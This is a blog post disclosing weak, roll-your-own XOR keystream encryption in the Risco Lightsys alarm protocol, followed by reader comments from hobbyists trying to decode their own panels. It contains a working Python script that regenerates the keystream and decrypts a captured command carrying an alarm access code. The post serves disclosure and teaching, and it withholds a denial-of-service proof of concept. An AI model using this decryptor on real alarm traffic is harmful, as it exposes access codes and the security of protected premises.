Vulnerability in Risco Lightsys protocol encryption

During a routine pen-test of an alarm receiving centre, a piece of software was found that was used to remotely configure Risco alarms.

This software communicates with alarm panels, sometimes over IP, sometimes over a mobile network. One of these panels is the Lightsys panel, which seems fairly common in the UK.

The encryption used by this protocol is token at best, and not suitable for securing communication across an untrusted network.

The protocol generates a psuedo-random sequence of numbers using a basic function. This is then XORed with the message to encrypt or decrypt.

Each panel has a “seed” that changes the encryption slightly. Because we have a partially known plaintext, you don’t need to know the seed to decrypt messages – it can just be determined. The seed tended to be the same across many panels.

numTable = [2, 4, 16, 32768]
PRNG_output = []

# This is the "Remote ID code" in the software
seed = 2

for i in range(0,255):
    bit = 0

    for j in range(0, 4):
        if (seed & numTable[j]) > 0:
            bit ^= 1

    seed = seed << 1 | bit
    PRNG_output.append(seed & 255)

# This has been captured from the network by tricking software into encrypting
# Message is 02RMT=1234 8EBC
# 02 is sequence number
# RMT is a command
# 1234 is the access code
msg = '353945620a804bc6dbe4b67ac0495503'.decode('hex')

plain = ''

for i in range(0, len(msg)):
    plain += chr(ord(msg[i]) ^ PRNG_output[i])

print "Decrypted message: %s" % plain

A further proof of concept was developed that can send and receive commands with alarms, leading to a denial-of-service condition. I am not disclosing this as it can cause harm and is not the root cause of the problem.

This was reported to Risco on 7th August. As of yet, they have not indicated if they wish to fix this issue.

Conclusion

  • Don’t roll your own encryption
  • If you have a key, make sure it has enough length to actually improve security

7 thoughts on “Vulnerability in Risco Lightsys protocol encryption

  1. Permalink  ⋅ Reply

    Luca

    June 8, 2018 at 4:55pm

    Hi ! Interesting article… I’m trying to access to my risco panel with a serial connection and decrypt data… Can you say me if your method is still applicable ? I tried but none…

    • Permalink  ⋅ Reply

      cybergibbons

      June 13, 2018 at 8:46am

      Sorry – really not sure! I didn’t really look at the serial side.

      • Permalink  ⋅ Reply

        Luca

        June 13, 2018 at 8:49am

        Oh, serial or ip connection, the same… this article still works on the ip connection ?

        • Permalink  ⋅ Reply

          Marco

          July 13, 2018 at 1:36pm

          Hi,
          I’m interested in hooking up a Linux monitor on my RISCO bus.
          Did you make any progress with the decryption part?
          I still have to figure out the serial part though…

    • Permalink  ⋅ Reply

      Tozman

      September 16, 2018 at 8:18pm

      There is a “debug” mode in their software, you can see the datas being sent.

      • Permalink  ⋅ Reply

        Hd

        August 31, 2019 at 12:32pm

        Trying to do the same for better integration with my system. So far I just had some time to hook up serial and sniffer on cs communication. Not really looked at the data yet

    • Permalink  ⋅ Reply

      John Tunnicliffe

      January 16, 2021 at 4:37pm

      Luca, did you get anywhere with this? I am using your extension to Home Assistant that uses the Risco Cloud. However, that becomes a paid subscription soon, so I started to investigate alternatives.

Leave a Reply

Your email will not be published. Name and Email fields are required.

This site uses Akismet to reduce spam. Learn how your comment data is processed.